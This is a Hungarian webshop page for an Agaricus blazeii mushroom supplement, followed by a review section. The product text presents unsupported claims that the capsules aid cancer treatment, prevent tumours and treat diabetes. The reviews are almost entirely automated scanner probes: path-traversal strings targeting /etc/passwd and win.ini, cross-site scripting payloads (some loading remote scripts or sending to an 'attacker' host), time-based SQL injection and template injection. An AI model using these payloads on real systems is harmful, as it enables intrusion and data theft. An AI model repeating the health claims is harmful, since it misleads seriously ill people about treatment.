kép

Sun Agaric - Agaricus blazeii


Ár: 5 990 Ft

Share

A Sun Agaric hatóanyagai révén szerepet játszik a tumoros betegségek kiegészítő terápiáiban, sőt jelentős szerepet játszhat a tumoros betegségek kialakulásának megelőzésében. Kutatások igazolják, hogy hatóanyagainak köszönhetően csökkennek a kemo-, és sugárterápia káros mellékhatásai. Az Agaricus blazeii stimulálja a szervezet természetes védekező mechanizmusát, és hatékonynak bizonyult a II. típusú diabétesz kezelésében is, de hozzájárulnak a trigliceridek csökkentéséhez is.

A gomba bizonyos vírusos és bakteriális fertőzések esetén jótékony hatással van a gyógyulási folyamatokra. Cukorbetegek is alkalmazhatják, mivel csökkenti az inzulin rezisztenciát, bizonyos ráktípusoknál pedig csökkentik a kemo- és sugárterápia egészségre káros mellékhatásait.
A gombában található ún. lentinan akár hússzor nagyobb mennyiségben is előfordulhat, mint más gombafajtákban. A lentinan alkotóelem a biológiai reakciók moderátora. Az Agaricus Blazei hatékonyan csökkenti a koleszterin szintet és pozitív hatással van a májműködésre.

Összetevők: Agaricus blazeii gomba kivonat (50% poliszacharid), hidroxi-proril-metil-cellulóz
Hatóanyag:6 db kapszulára vonatkoztatva
2400 mg Agaricus blazeii gomba kivonatot (50% poliszacharid) 
Adagolás: 2-6 kapszula/nap (A kapszulákat étkezés előtt vegye be!)


Alkalmazási területek:

cukorbetegség
allergia
májvédő
méhnyakrák
immunerősítő

Figyelmeztetés: Ne használja a készítményeket terhesség és szoptatás ideje alatt. Használat előtt kérdezze meg kezelőorvosát, gyógyszerészét, valamint a következő esetekben: ha teherbeesést segítő készítményt szed, gyógyszert szed vagy orvosi kezelés alatt áll. Hosszú ideig tartó használatra nem javallott. Az étrend-kiegészítő nem helyettesíti a vegyes étrendet (és az egészséges életmódot)! Az ajánlott napi mennyiséget ne lépje túl!
Származási hely: Anglia

Agaricus blazei (Agaricus brasiliensis) Mandula vagy Brazil gomba
 (klinikai útmutató: Martin Powell)

japán neve: Himematsutake
portugál neve - Cogumela del sol
angol neve: Royal/Sun Agaric

A legismertebb nevén az Agaricus blazei Murrilt (ABM) már 1893-ban azonosították, de a Brazíliában őshonos gomba gyógyhatására csak 1965-ben figyeltek fel a japán tudósok. A fő hatóanyagának számító poliszacharidokról kiderült, hogy az  immunrendszer aktiválásán  keresztül rákellenes  hatást fejtenek ki. Javítják a rákbetegségben szenvedők életminőségét, erősítik az immunrendszerüket és csökkentik a kemoterápiájuk mellékhatásait. Az Agaricus. blazei Mulli egyéb, gyógyászatilag jelentős hatóanyagot is tartalmaz: linolsav, olajsav, sztearin sav és az ergoszterol. 


Rákos megbetegedések
Az Agaricus blazei poliszacharid kivonatával végzett klinikai vizsgálatok jelentős mértékű javulást mutattak számos rákos elfajulásnál: tüdőrák, méhnyak-, petefészek-, és a méhnyálkahártya rák, prosztatarák, Ehrlich hashártya rák és a szarkóma esetén. A kemo- és sugárterápiát kiegészítő gombakivonat hatására a páciensek gyorsabban reagáltak a kezelésre és kevesebb mellékhatásról számoltak be.

Immunhiányos egerekben megfigyelték, hogy a Mandula gombakivonat adagolása mellett a tumor mérete is csökkent és az egyed súlyvesztésének mértéke is lelassult. 
Megállapították, hogy az A. blazei poliszacharidjai közvetlenül gátolják a prosztatarákos sejtek burjánzását és az áttétek kialakulását. 

Két kínai vizsgálat megerősítette, hogy az Agaricus blazei Murill gombatest kivonatának forró vizes (tea) változata javítja a kemoterápiás kezelésben részesülő akut limfoid leukémiás betegek vérképzőrendszeri paramétereit és életkilátásait.

Egyéb pozitív klinikai eredmények születtek emlőrákos páciensek esetében is, amelyet a A. blazei a konjugált linolsav tartalmával hoztak összefüggésbe, amely in-vitro (testen kívüli) vizsgálatok alapján aromatáz-gátló hatást mutatott (egyes kemoterápiás készítmények is ezen hatáson alapszanak). 

A nőgyógyászati rákban szenvedőknél az Agaricus blazei gyógygombával kezelt betegeknél a természetes ölősejtek rákellenes aktivitása lényegesen fokozódott, valamint csökkent a kemoterápiás szerek mellékhatásai, pl. hajhullás, hányinger, hányás, álmatlanság, étvágytalanság, általános gyengeség. 
Számos tanulmány megerősítette már, hogy a jobb életminőség és általános állapot elősegíti a rákbetegek túlélési esélyét.

Anyagcsere betegségek
Eddig kevés klinikai adat jelent meg, bár egy 2008-as tanulmány szerint az Agaricus blazei Murill gombatest kivonata csökkentette a koleszterin-és a vércukorszintet is. Egy Tajvanon végzett placebo kontrollált kettősvak klinikai kísérlet (2007) megállapította, hogy az A.blazei kivonata javítja az inzulin érzékenységet a gyógyszerrel kezelt cukorbetegeknél.

Az utóbbi években egyre világosabbá vált, hogy egyes gyógygombák rákellenes hatásuk nem csak az immunrendszer modulálásával érik el, hanem az inzulin érzékenység növelésével is hozzájárulnak a kedvező eredményekhez. Természetesen azoknál is, akik nem cukorbetegek. Ugyanis az inzulin érzékenység csökkenése elősegíti számos ráktípus kialakulását és a már megbetegedetteknél csökkentheti a túlélési esélyeket (pl. emlő, máj, prosztata, hasnyálmirigy, vastagbélrák).

Autimmun betegségek
Az autoimmun eredetű reumás gyulladásokat és az azzal járó fájdalmakat is enyhíti a Royal Sun Agaricus kivonata.

Allergiás betegségek
Az Agaricus blazei az erős immunrendszer moduláló hatással rendelkező gombák közé is sorolható. E csoportba tartozó gombák megfelelő arányú kombinációjával (A. blazei 82% , H. erinaceous 15%  és G. frondosa 3%) gátolni képesek a hisztamin felszabadulását, vagyis a allergiás reakció kialakulását.

Májbetegségek
Wang és munkatársai beszámoltak az A.blazei kivonatának (2x20g napi adagban 3 hónapig) jótékony hatására a krónikus hepatitis B betegekre, akiknek csökkent a hasi puffadása, a fáradtságuk, a májtáji fájdalmuk, a máj- és a lépmegnagyobbodásuk.    

KLINIKAI ÖSSZESÍTŐ

Terápiás jelentősége: Az Agaricus blazei Murill gyógygomba kivonatról placebo kontrollált kettősvak klinikai kísérletben (Tajvan, Dél-Korea) is megerősítették, hogy javítja a rákbetegek életminősét és immunrendszerük működését, valamint jelentősen fokozza az inzulin érzékenységet.

Főbb hatóanyagai: 
-    immunmoduláns poliszacharidok
-    linolsav
-    olajsav
-    sztearin sav 
-    ergoszterol

Az Agaricus blazeii (mandula gomba) hozzájárul az immunrendszer optimális működéséhez.

Összetevők: Agaricus blazeii gomba kivonat (50% poliszacharid), hidroxi-proril-metil-cellulóz

OÉTI:9812/2011

kiszerelés: 60db kapszula/doboz

Összetevők:

Agaricus blazeii gomba kivonatot (50% poliszacharid), hidroxi-proril-metil-cellulóz

Hatóanyag:6 db kapszulára vonatkoztatva

2400 mg Agaricus blazeii gomba kivonatot (50% poliszacharid) 

Adagolás: 2-6 kapszula/nap (A kapszulákat étkezés előtt vegye be!)

Csomagolási egység: A műanyag tégely 60db kapszulát tartalmaz

Figyelmeztetés: Ne használja a készítményeket terhesség és szoptatás ideje alatt. Használat előtt kérdezze meg kezelőorvosát, gyógyszerészét, valamint a következő esetekben: ha teherbeesést segítő készítményt szed, gyógyszert szed vagy orvosi kezelés alatt áll. Hosszú ideig tartó használatra nem javallott. Az étrend-kiegészítő nem helyettesíti a vegyes étrendet (és az egészséges életmódot)! Az ajánlott napi mennyiséget ne lépje túl!
Származási hely: Anglia

oiamknew 2020-08-15 19:05:16
Értékelés:
WEB-INF\web.xml
oiamknew 2020-08-15 19:05:00
Értékelés:
WEB-INF/web.xml
oiamknew 2020-08-15 19:04:54
Értékelés:
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
oiamknew 2020-08-15 19:04:50
Értékelés:
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
oiamknew 2020-08-15 19:04:46
Értékelés:
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
oiamknew 2020-08-15 19:04:36
Értékelés:
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
oiamknew 2020-08-15 19:04:31
Értékelés:
..\..\..\..\..\..\..\..\windows\win.ini
oiamknew 2020-08-15 19:04:27
Értékelés:
................windowswin.ini
oiamknew 2020-08-15 19:04:24
Értékelés:
oiamknew 2020-08-15 19:04:15
Értékelés:
../../../../../../../../../../windows/win.ini.jpg
oiamknew 2020-08-15 19:04:12
Értékelés:
C:\WINDOWS\system32\drivers\etc\hosts
oiamknew 2020-08-15 19:04:07
Értékelés:
../../../../../../../../../../windows/win.ini
rbmsptfp 2020-08-15 19:04:04
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<img sRc='http://attacker-9346/log.php?
oiamknew 2020-08-15 19:04:00
Értékelés:
WEB-INF\web.xml
rbmsptfp 2020-08-15 19:03:50
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<KX6yC6 x=9155>
oiamknew 2020-08-15 19:03:49
Értékelés:
/WEB-INF/web.xml
oiamknew 2020-08-15 19:03:43
Értékelés:
WEB-INF/web.xml
oiamknew 2020-08-15 19:03:37
Értékelés:
/\../\../\../\../\../\../\../etc/passwd
rbmsptfp 2020-08-15 19:03:33
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<ifRAme sRc=9536.com></IfRamE>
oiamknew 2020-08-15 19:03:30
Értékelés:
file:///etc/passwd
oiamknew 2020-08-15 19:03:28
Értékelés:
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
rbmsptfp 2020-08-15 19:03:26
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<WDOB3X>NATER[!+!]</WDOB3X>
oiamknew 2020-08-15 19:03:24
Értékelés:
..
oiamknew 2020-08-15 19:03:20
Értékelés:
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
rbmsptfp 2020-08-15 19:03:16
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!gofRI <ScRiPt >yjwM(9838)</ScRiPt>
oiamknew 2020-08-15 19:03:14
Értékelés:
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
oiamknew 2020-08-15 19:02:59
Értékelés:
/.././.././.././.././.././.././.././../etc/./passwd%00
rbmsptfp 2020-08-15 19:02:52
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<% contenteditable onresize=yjwM(9193)>
oiamknew 2020-08-15 19:02:51
Értékelés:
%2fetc%2fpasswd
oiamknew 2020-08-15 19:02:46
Értékelés:
/etc/passwd
rbmsptfp 2020-08-15 19:02:45
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!}body{acu:Expre/**/SSion(yjwM(9405))}
oiamknew 2020-08-15 19:02:43
Értékelés:
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
rbmsptfp 2020-08-15 19:02:35
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<img<!-- --> src=x onerror=alert(9087);//><!-- -->
oiamknew 2020-08-15 19:02:32
Értékelés:
/../..//../..//../..//../..//../..//etc/passwd.jpg
oiamknew 2020-08-15 19:02:27
Értékelés:
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
rbmsptfp 2020-08-15 19:02:25
Értékelés:
[url=http://www.vulnweb.com][/url]
oiamknew 2020-08-15 19:02:20
Értékelés:
../../../../../../../../../../etc/passwd.jpg
oiamknew 2020-08-15 19:02:17
Értékelés:
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
oiamknew 2020-08-15 19:02:12
Értékelés:
../../../../../../../../../../../../../../../proc/version
rbmsptfp 2020-08-15 19:02:10
Értékelés:
<a HrEF=jaVaScRiPT:>
oiamknew 2020-08-15 19:02:07
Értékelés:
../../../../../../../../../../etc/passwd
rbmsptfp 2020-08-15 19:01:53
Értékelés:
<a HrEF=http://www.vulnweb.com></a>
rbmsptfp 2020-08-15 19:01:33
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<input autofocus onfocus=yjwM(9975)>
rbmsptfp 2020-08-15 19:01:25
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<input autofocus onfocus=yjwM(9975)>
rbmsptfp 2020-08-15 19:00:23
Értékelés:
rbmsptfp 2020-08-15 18:59:56
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!&lt;ScRiPt&gt;yjwM(9940)&lt;/sCripT&gt;
rbmsptfp 2020-08-15 18:59:45
Értékelés:
Írj véleményt a termékről!\u003CScRiPt\yjwM(9054)\u003C/sCripT\u003E
rbmsptfp 2020-08-15 18:59:28
Értékelés:
%25%63%33%25%38%64%72%6A%25%32%30%76%25%63%33%25%61%39%6C%65%6D%25%63%33%25%61%39%6E%79%74%25%32%30%61%25%32%30%74%65%72%6D%25%63%33%25%61%39%6B%72%25%63%35%25%39%31%6C%21%3C%53%63%52%69%50%74%20%3E%79%6A%77%4D%289606%29%3C%2F%73%43%72%69%70%54%3E
rbmsptfp 2020-08-15 18:59:18
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<img/src=">" onerror=alert(9737)>
rbmsptfp 2020-08-15 18:59:13
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<img src=xyz OnErRor=yjwM(9027)>
rbmsptfp 2020-08-15 18:59:08
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<img src=//testasp.vulnweb.com/t/dot.gif onload=yjwM(9065)>
rbmsptfp 2020-08-15 18:59:02
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<body onload=yjwM(9592)>
rbmsptfp 2020-08-15 18:58:55
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9214'>
rbmsptfp 2020-08-15 18:58:48
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<isindex type=image src=1 onerror=yjwM(9672)>
rbmsptfp 2020-08-15 18:58:39
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<svg
rbmsptfp 2020-08-15 18:58:30
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<video><source onerror="javascript:yjwM(9306)">
rbmsptfp 2020-08-15 18:58:18
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<ScRiPt >yjwM(9415)</ScRiPt>
oovclidx 2020-08-15 18:58:12
Értékelés:
17'
rbmsptfp 2020-08-15 18:58:12
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9938></ScRiPt>
oovclidx 2020-08-15 18:58:10
Értékelés:
FkNFK6Ly'));select pg_sleep(21.5); --
rbmsptfp 2020-08-15 18:58:08
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<ScRiPt >yjwM(9981)</ScRiPt>
oovclidx 2020-08-15 18:58:07
Értékelés:
kRKvQGjd');select pg_sleep(21.5); --
oovclidx 2020-08-15 18:58:05
Értékelés:
nbatfPGZ';select pg_sleep(10.75); --
oovclidx 2020-08-15 18:58:01
Értékelés:
qNCHxHGJ'; waitfor delay '0:0:10.75' --
rbmsptfp 2020-08-15 18:57:57
Értékelés:
Írj véleményt a termékről!<ScR<ScRiPt>IpT>yjwM(9658)</sCr<ScRiPt>IpT>
oovclidx 2020-08-15 18:57:55
Értékelés:
1 waitfor delay '0:0:10.75' --
oovclidx 2020-08-15 18:57:52
Értékelés:
(select(0)from(select(sleep(32.25)))v)/*'+(select(0)from(select(sleep(32.25)))v)+'"+(select(0)from(select(sleep(32.25)))v)+"*/
oovclidx 2020-08-15 18:57:50
Értékelés:
if(now()=sysdate(),sleep(32.25),0)/*'XOR(if(now()=sysdate(),sleep(32.25),0))OR'"XOR(if(now()=sysdate(),sleep(32.25),0))OR"*/
rbmsptfp 2020-08-15 18:57:49
Értékelés:
Írj véleményt a termékről!<script>yjwM(9668)</script>
oovclidx 2020-08-15 18:57:48
Értékelés:
-1" OR 2+600-600-1=0+0+0+1 --
oovclidx 2020-08-15 18:57:44
Értékelés:
-1' OR 2+913-913-1=0+0+0+1 or 'RODB0ZMs'='
rbmsptfp 2020-08-15 18:57:42
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<WJRRKF>LFNKX[!+!]</WJRRKF>
oovclidx 2020-08-15 18:57:39
Értékelés:
-1' OR 2+445-445-1=0+0+0+1 --
rbmsptfp 2020-08-15 18:57:33
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<ScRiPt >yjwM(9279)</ScRiPt>
oovclidx 2020-08-15 18:57:31
Értékelés:
-1 OR 2+965-965-1=0+0+0+1
oovclidx 2020-08-15 18:57:19
Értékelés:
-1 OR 2+882-882-1=0+0+0+1 --
oovclidx 2020-08-15 18:57:13
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!
rbmsptfp 2020-08-15 18:57:05
Értékelés:
{{10000269*10000250}}
oovclidx 2020-08-15 18:57:03
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!
rbmsptfp 2020-08-15 18:56:55
Értékelés:
CWS000x
rbmsptfp 2020-08-15 18:56:18
Értékelés:
acux1108
rbmsptfp 2020-08-15 18:56:05
Értékelés:
acu5626<s1﹥s2ʺs3ʹuca5626
rbmsptfp 2020-08-15 18:55:53
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!9943008
rbmsptfp 2020-08-15 18:55:32
Értékelés:
'"()&%<acx><ScRiPt >yjwM(9184)</ScRiPt>
rbmsptfp 2020-08-15 18:55:23
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!'"()&%<acx><ScRiPt >yjwM(9378)</ScRiPt>
WEB-INF\web.xml 2020-08-15 18:54:58
Értékelés:
Írj véleményt a termékről!
WEB-INF/web.xml 2020-08-15 18:54:56
Értékelés:
Írj véleményt a termékről!
lfchbddv 2020-08-15 18:54:46
Értékelés:
Írj véleményt a termékről!
memkqgib 2020-08-15 18:54:42
Értékelés:
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini 2020-08-15 18:54:34
Értékelés:
Írj véleményt a termékről!
memkqgib 2020-08-15 18:54:32
Értékelés:
..\..\..\..\..\..\..\..\windows\win.ini 2020-08-15 18:54:30
Értékelés:
Írj véleményt a termékről!
memkqgib 2020-08-15 18:54:29
Értékelés:
JyI=
................windowswin.ini 2020-08-15 18:54:26
Értékelés:
Írj véleményt a termékről!
memkqgib 2020-08-15 18:54:25
Értékelés:
@@FaT1e
../../../../../../../../../../windows/win.ini.jpg 2020-08-15 18:54:20
Értékelés:
Írj véleményt a termékről!
